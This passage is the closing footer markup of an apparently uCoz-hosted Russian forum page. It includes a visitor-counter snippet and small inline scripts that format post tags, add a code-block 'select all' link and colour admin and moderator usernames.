((iI=iT.indexOf('/'))!=-1)?(iT=iT.substring(0,iI)):(iI=iT.length); if(iT!=iH.substring(0,iI))iS+='&f'+escape(iD.referrer.slice(7)); iS+='&r'+escape(iH); iD.write(iS+'" border="0" width="88" height="31" />'); //--></script></a><!-- End of I.UA counter --> </noindex> </td> <td width="90" height="33" style="border-style: none; border-width: medium"> <noindex> <!-- "' --><span class="pbFL8hDH"><a href="https://www.ucoz.ru/"><img style="width:81px; height:31px;" src="/.s/img/cp/32.gif" alt="" /></a></span> </noindex> </td><!--/U1VIDEO1Z--> </tr> </table> </div></div> </font> </td> <td width="15" height="1" style="border-style: none; border-width: medium"> <p align="right"> <img border="0" src="/images/modern_footer_main_border_right.gif" width="18" height="75"></td> </tr> </table> </div> </td> </tr> </tbody> </table> <script type="text/javascript"> e=document.getElementsByTagName("TD"); for(k=15; k<e.length;k++) { if(e[k].className=='posttdMessage') { s=e[k].innerHTML; while (s.indexOf('[qc]') != -1){ s=s.replace('[qc]','<div style="text-align: center;">'); s=s.replace('[/qc]','</div>'); e[k].innerHTML=s; } } } </script> <script type="text/javascript" language="javascript"> e=document.getElementsByTagName("TD"); for(k=15; k<e.length;k++) { if(e[k].className=='posttdMessage') { s=e[k].innerHTML; while (s.indexOf('[P.s]') != -1){ s=s.replace('[P.s]','<font style="font-size: 10px; font-family: Verdana; color: #8a8a8a;">P.s </font><font style="font-size: 11px; font-family: Verdana; color: #8a8a8a;">'); s=s.replace('[/P.s]','</font>'); e[k].innerHTML=s; } } } </script> <script type="text/javascript"> // Select Code from phpBB3 to uCoz ~ http://allcity.net.ru/ function selectCode(a){ var e=a.parentNode.parentNode.getElementsByTagName('code')[0]; if(window.getSelection){ var s=window.getSelection(); if(s.setBaseAndExtent){ s.setBaseAndExtent(e,0,e,e.innerText.length-1); }else{ var r=document.createRange(); r.selectNodeContents(e); s.removeAllRanges(); s.addRange(r);} }else if(document.getSelection){ var s=document.getSelection(); var r=document.createRange(); r.selectNodeContents(e); s.removeAllRanges(); s.addRange(r); }else if(document.selection){ var r=document.body.createTextRange(); r.moveToElementText(e); r.select();}} // Замена Code на Выделить всё... codediv=document.getElementsByTagName('div'); for(i=0;i<codediv.length;i++){ if(codediv[i].className=="bbCodeBlock"){ s=codediv[i].innerHTML; s=s.replace(/>Code</g,'>Код: <a href="#" onclick="selectCode(this);return false;">Выделить всё<\/a><').replace('<!--uzc-->','<!--uzc--><code>').replace('<!--\/uzc-->','<\/code><!--\/uzc-->'); codediv[i].innerHTML=s;}} </script> <script type="text/javascript"> links=document.getElementsByTagName('a'); admins=new Array('SToRM'); // moders=new Array('RoleX-X','Rmk'); // admcol='red'; modcol='blue'; // for(i=0;i<links.length;i++){ if(links[i].className=='lastPostUserLink'){ for(m=0;m<moders.length;m++){ if(links[i].innerHTML==moders[m]){ links[i].style.color=modcol;}} for(a=0;a<admins.length;a++){ if(links[i].innerHTML==admins[a]){ links[i].style.color=admcol;}}}} </script></FONT><BR> </body> </html> <!-- 0.25111 (s18) -->